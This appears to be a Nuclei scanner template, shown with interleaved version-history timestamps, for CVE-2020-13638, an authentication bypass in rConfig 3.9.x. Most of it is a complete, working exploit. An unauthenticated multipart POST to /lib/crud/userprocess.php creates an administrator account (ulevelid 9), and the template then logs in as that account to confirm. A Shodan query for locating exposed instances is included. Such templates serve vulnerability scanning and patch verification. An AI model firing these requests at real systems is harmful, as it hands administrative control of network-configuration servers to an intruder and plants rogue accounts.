2023-10-17 07:20:28 +00:00
id : CVE-2020-13638
info :
name : rConfig 3.9 - Authentication Bypass(Admin Login)
author : theamanrawat
severity : critical
description : |
lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.
reference :
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13638
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2020-13638
2023-10-17 17:52:26 +00:00
cwe-id : CWE-269
2023-11-03 10:59:12 +00:00
epss-score : 0.324
2023-11-23 13:39:16 +00:00
epss-percentile : 0.96575
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 3
vendor : rconfig
product : rconfig
2023-10-17 07:20:28 +00:00
shodan-query : http.title:"rConfig"
2023-10-17 17:52:26 +00:00
tags : cve,cve2020,rconfig,auth-bypass,intrusive
2023-10-17 07:20:28 +00:00
variables :
username : "{{to_lower(rand_text_alpha(5))}}"
password : "{{rand_text_alphanumeric(12)}}!"
email : "{{rand_base(8)}}@{{rand_base(5)}}.com"
http :
- raw :
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="username"
{{username}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="passconf"
{{password}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="password"
{{password}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="email"
{{email}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="editid"
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="add"
add
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="ulevelid"
9
--01b28e152ee044338224bf647275f8eb--
- |
GET /login.php HTTP/1.1
Host : {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
host-redirects : true
2023-10-17 17:52:26 +00:00
2023-10-17 07:20:28 +00:00
matchers-condition : and
matchers :
- type : word
part : body_3
words :
- "rConfig - Configuration Management"
- "Logged in as"
- "dashboadFieldSet"
condition : and
- type : word
part : header_3
words :
- 'text/html'
- type : status
status :
- 200
2023-11-23 15:07:55 +00:00
# digest: 4b0a00483046022100f1dc88f87fd7d3c5b32af12192a4e19aaddb849c9332cb40397adbe34d774f37022100f5d96e11f9a6ec436f272f4dfc9ddd733f8656da655aad933d3661350ac6e0f9:922c64590222798bb761d5b6d8e72950